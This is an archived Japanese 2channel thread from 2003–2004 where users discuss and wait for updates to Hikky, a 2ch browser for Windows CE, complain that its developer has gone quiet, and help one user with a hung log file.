どっから持ってきたのかニャ・・・

“命の水”はあれ何の意味もなかったんだなー

166 :いつでもどこでも名無しさん:03/12/12 18:03 ID:???
思うにどんな刀で刺そうが、銃で撃とうが焼き殺そうが・・・
あの飛び出してきた虫さえ踏む潰せば、それで済んだんじゃねーのか?(w

167 :いつでもどこでも名無しさん:03/12/12 19:16 ID:???
虫きり丸のさやを填めて
人の血にまみれさせると念が籠もって
虫を追い出すことが出来るってことだったんでしょ。
それにしてもあのマルチ商法は本当に話に関係なかったね。
かなり始めの頃から出てきてたから、てっきり何かの伏線だと思ってたよ。

168 :いつでもどこでも名無しさん:03/12/13 15:13 ID:???
さ来週あたりに,長時間総集篇放送のニョガン♪

169 :いつでもどこでも名無しさん:03/12/15 23:24 ID:hua0reXt
手伝ってくれる方キボンヌ
http://program.dot.thebbs.jp/1071486463.html

170 :いつでもどこでも名無しさん:03/12/26 13:53 ID:aKKIxWLS
>>147
些細なことだが5分と言わず、2分で十分


171 :いつでもどこでも名無しさん:03/12/26 20:10 ID:???
2分は2分。60分で1時間。

172 :いつでもどこでも名無しさん:03/12/27 18:18 ID:???
http://pc3.2ch.net/test/read.cgi/mobile/1072516253/
新たな2chブラウザを待ち望むスレを建てたので良かったら来てね。

173 :いつでもどこでも名無しさん:04/01/08 14:35 ID:DGRX6zsV
83 名前:いつでもどこでも名無しさん 投稿日:01/09/14 23:21 ID:4KvdRMjw
というわけで、WinCE用2ちゃんブラウザHikkyです。
まだ作りかけなのですが雰囲気だけでもどうぞ。

圧縮転送対応なのでzlibce.dllを準備して置いてくださいね。

ホームページ
http://www.geocities.co.jp/SiliconValley-Cupertino/6987/hikky.html
スクリーンショット
http://www.geocities.co.jp/SiliconValley-Cupertino/6987/hikkyscreen.html
zlibce
http://www.tenik.co.jp/~adachi/wince/index_j.htm


84 名前:あげ 投稿日:01/09/15 11:38 ID:???
あげ


85 名前:ヘタレ 投稿日:01/09/15 14:25 ID:uxh1X6hQ
とりあえず、暫定公開的にアップしました
SH3、ARM、MIPS、これだけでいいんだっけ??

http://www.geocities.co.jp/SiliconValley-Cupertino/6987/hikky.html



174 :いつでもどこでも名無しさん:04/01/09 12:35 ID:???
ヘタレさんおらは今でも感謝してますよ。
感謝しながら使わせてもらってます。
これまでもこれからもHikky1本でつ。

175 :いつでもどこでも名無しさん:04/01/10 11:13 ID:???
もすこし待て

176 :いつでもどこでも名無しさん:04/01/10 21:50 ID:???
何を?… (´ρ`)

177 :いつでもどこでも名無しさん:04/01/10 23:32 ID:???

           __
          〈〈〈〈 ヽ
          〈⊃  }        ∩___∩
   ∩___∩  |   |        | ノ --‐'  、_\
   | ノ      ヽ !   !   、   / ,_;:;:;ノ、  ● |
  /  ●   ● |  /   ,,・_  |    ( _●_)  ミ ←>>175
  |    ( _●_)  ミ/ , ’,∴ ・ ¨彡、   |∪|  ミ
 彡、   |∪|  /  、・∵ ’  /     ヽノ ̄ヽ
/ __  ヽノ /         /       /\ 〉
(___)   /         /        /

いいかげん目を覚ませ!
ヘタレは逃げたんだよ!!

178 :いつでもどこでも名無しさん:04/01/17 15:26 ID:???
逃げたのではない。
卒業したのだ。

179 :いつでもどこでも名無しさん:04/01/17 15:32 ID:???
うーむ、それにしても遅いな・・・開発は順調だと言っていたのだが。

180 :名無し募集中。。。:04/01/28 10:58 ID:???
Hikkyを自分で作れ!
VCができれば誰でもできるだろ!?
オレはVC得意じゃないから無理。
おまいらにまかせた!

181 :いつでもどこでも名無しさん:04/02/02 14:33 ID:hkZWNvkX
ヨーーーシ!

182 :いつでもどこでも名無しさん:04/02/02 14:42 ID:???
このスレまだあったんだ…。

183 :いつでもどこでも名無しさん:04/02/02 14:57 ID:???
ワクワク!


184 :いつでもどこでも名無しさん:04/02/02 16:50 ID:???
>>173
懐かしいね、それまであんまりWinCEに興味なかったんだけど
これとAirHの組み合わせで完全にはまった。

185 :いつでもどこでも名無しさん:04/02/23 22:45 ID:???
もう保守する人もいないのか

186 :いつでもどこでも名無しさん:04/02/24 00:33 ID:???
そんなすぐにはdat落ちしないよ

187 :いつでもどこでも名無しさん:04/02/24 23:08 ID:???
結局口先だけのヤツだったなヘタレは・・・
なんか風邪だとか言ってたあたりからダメなヤツとはわかってたけど。

188 :いつでもどこでも名無しさん:04/03/10 14:48 ID:???
おれもう少し待ってみるよ。

189 :いつでもどこでも名無しさん:04/03/12 11:58 ID:???
もう春だね〜

190 :いつでもどこでも名無しさん:04/03/16 13:32 ID:jzC3f0gh
どこかでヘタレさん見かけませんでしたか?

191 :いつでもどこでも名無しさん:04/03/17 17:14 ID:W8c8Bm9T
いや、みないね。

192 :いつでもどこでも名無しさん:04/03/18 22:01 ID:???
へたれタンを捜しに逝ってきまつ。

193 :いつでもどこでも名無しさん:04/03/18 23:46 ID:lUhg2wNq
あぼーんでログが詰まった可能性があります。とかいってハングしてしまった。
どうすりゃいいんだ?

194 :いつでもどこでも名無しさん:04/03/19 00:09 ID:???
>>193
一度ログを捨てて再取得する

195 :いつでもどこでも名無しさん:04/03/19 01:17 ID:P+bqKSIH
保守

196 :いつでもどこでも名無しさん:04/03/19 03:44 ID:???
>春は来る?CE用2chブラウザ「Hikky」
>「Hikky」

激しくウケタ


197 :いつでもどこでも名無しさん:04/03/20 07:09 ID:???
>>194
解決しました。ありがとうございます。
×ボタンが効かなかったから削除も無理だと思っていました。
ログファイルが壊れてしまったんですか?

39 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)